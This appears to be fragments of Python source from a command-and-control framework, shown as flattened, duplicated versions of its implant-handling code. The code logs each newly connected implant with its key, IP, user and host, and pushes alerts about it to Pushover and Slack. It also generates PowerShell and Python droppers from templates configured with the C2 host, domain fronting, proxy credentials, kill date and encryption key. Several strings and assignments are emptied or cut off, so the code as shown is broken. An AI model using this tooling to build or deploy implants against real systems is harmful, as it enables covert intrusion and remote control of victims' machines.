def display(self): print(Colours.GREEN, "") it = self.Pivot if "pbind" in it.lower(): urlInfo = "PBind" if "fcomm" in it.lower(): urlInfo = "FComm" else: urlInfo = get_url_by_id(self.URLID[0]) if urlInfo is not None: urlInfo = f"URL: {urlInfo[1]}" else: urlInfo = "URL: Unknown" print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key)) print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" % (self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep), (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo)) EnableNotifications = get_notificationstatus() try: Pushover_APIToken = select_item("Pushover_APIToken", "C2Server") Pushover_APIUser = select_item("Pushover_APIUser", "C2Server") if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken: conn = http.client.HTTPSConnection("") conn.request("POST", "/1/messages.json", urllib.parse.urlencode({ "token": Pushover_APIToken, "user": Pushover_APIUser, "message": "[%s] - NewImplant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname), }), {"Content-type": "application/x-www-form-urlencoded"}) output = conn.getresponse() if output.status != 200: data = print("\nPushover error: ") print(data) except Exception as e: print("Pushover send error: %s" % e) try: Slack_BotToken = select_item("Slack_BotToken", "C2Server") if EnableNotifications.lower().strip() == "yes" and Slack_BotToken: mention_userid = select_item("Slack_UserID", "C2Server") channel = select_item("Slack_Channel", "C2Server") Slack_BotToken = str("Bearer ")+Slack_BotToken if mention_userid in ("", None): mention_userid = "" elif mention_userid.lower().strip() == "channel": mention_userid = "<!channel> " else: mention_userid = "<@%s> " % str(mention_userid) message = {"channel": channel, "text": "%s[%s] - NewImplant: %s @ %s" % (mention_userid, NotificationsProjectName, self.User, self.Hostname), "as_user": "******", "link_names": "true"} headers = {"Content-type": "application/json","Authorization": Slack_BotToken } conn = http.client.HTTPSConnection("") conn.request("POST", "/api/chat.postMessage",json.dumps(message), headers) output = conn.getresponse() if output.status != 200: data = print("Slack error: ") print(data) except Exception as e: print("Slack send error: %s" % e)
def display(self): print(Colours.GREEN, "") it = self.Pivot if "pbind" in it.lower(): urlInfo = "PBind" else: urlInfo = get_url_by_id(self.URLID[0]) if urlInfo is not None: urlInfo = f"URL: {urlInfo[1]}" else: urlInfo = "URL: Unknown" print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key)) print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" % (self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep), (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo)) EnableNotifications = get_notificationstatus() try: Pushover_APIToken = select_item("Pushover_APIToken", "C2Server") Pushover_APIUser = select_item("Pushover_APIUser", "C2Server") if EnableNotifications.lower().strip() == "yes": conn = http.client.HTTPSConnection("") conn.request( "POST", "/1/messages.json", urllib.parse.urlencode({ "token": Pushover_APIToken, "user": Pushover_APIUser, "message": "[%s] - NewImplant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname), }), {"Content-type": "application/x-www-form-urlencoded"}) output = conn.getresponse() if output.status != 200: data = print("\nPushover error: ") print(data) except Exception as e: print("Pushover send error: %s" % e)
def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret): if not URLID: URLID = get_default_url_id() self.URLID = URLID urlDetails = get_url_by_id(self.URLID) self.KillDate = KillDate self.Key = Key self.QuickCommand = select_item("QuickCommand", "C2Server") self.FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server")) self.PayloadCommsHost = urlDetails[2] self.DomainFrontHeader = urlDetails[3] self.Proxyurl = urlDetails[4] self.Proxyuser = urlDetails[5] self.Proxypass = urlDetails[6] self.PowerShellProxyCommand = PowerShellProxyCommand self.ImplantType = ImplantType self.Insecure = Insecure self.UserAgent = UserAgent self.Referrer = Referrer self.ConnectURL = ConnectURL self.BaseDirectory = BaseDirectory self.PBindPipeName = PBindPipeName if PBindPipeName else DefaultPBindPipeName self.PBindSecret = PBindSecret if PBindSecret else DefaultPBindSecret self.BaseDirectory = BaseDirectory self.PSDropper = "" self.PyDropper = "" if os.path.exists("" % PayloadsDirectory): with open("" % PayloadsDirectory, 'r') as f: content = m ='#KEY(.+?)#KEY', content) if m: keyfound = self.PyDropperHash = hashlib.sha512(content.encode("utf-8")).hexdigest() self.PyDropperKey = keyfound else: self.PyDropperKey = str(gen_key().decode("utf-8")) randomkey = self.PyDropperKey with open("" % PayloadTemplatesDirectory, 'r') as f: content = aespy = str(content).replace("#REPLACEKEY#", "#KEY%s#KEY" % randomkey) filename = "" % (self.BaseDirectory) with open(filename, 'w') as f: f.write(aespy) self.PyDropperHash = hashlib.sha512((aespy).encode('utf-8')).hexdigest() with open("%sdropper.ps1" % PayloadTemplatesDirectory, 'r') as f: content = self.PSDropper = str(content) \ .replace("#REPLACEINSECURE#", self.Insecure) \ .replace("#REPLACEHOSTPORT#", self.PayloadCommsHost) \ .replace("#REPLACECONNECTURL#", (self.ConnectURL + self.ImplantType)) \ .replace("#REPLACEIMPTYPE#", self.PayloadCommsHost) \ .replace("#REPLACEKILLDATE#", self.KillDate) \ .replace("#REPLACEPROXYUSER#", self.Proxyuser) \ .replace("#REPLACEPROXYPASS#", self.Proxypass) \ .replace("#REPLACEPROXYURL#", self.Proxyurl) \ .replace("#REPLACEPROXYCOMMAND#", self.PowerShellProxyCommand) \ .replace("#REPLACEDOMAINFRONT#", self.DomainFrontHeader) \ .replace("#REPLACECONNECT#", self.ConnectURL) \ .replace("#REPLACEUSERAGENT#", self.UserAgent) \ .replace("#REPLACEREFERER#", self.Referrer) \ .replace("#REPLACEURLID#", str(self.URLID)) \ .replace("#REPLACEKEY#", self.Key)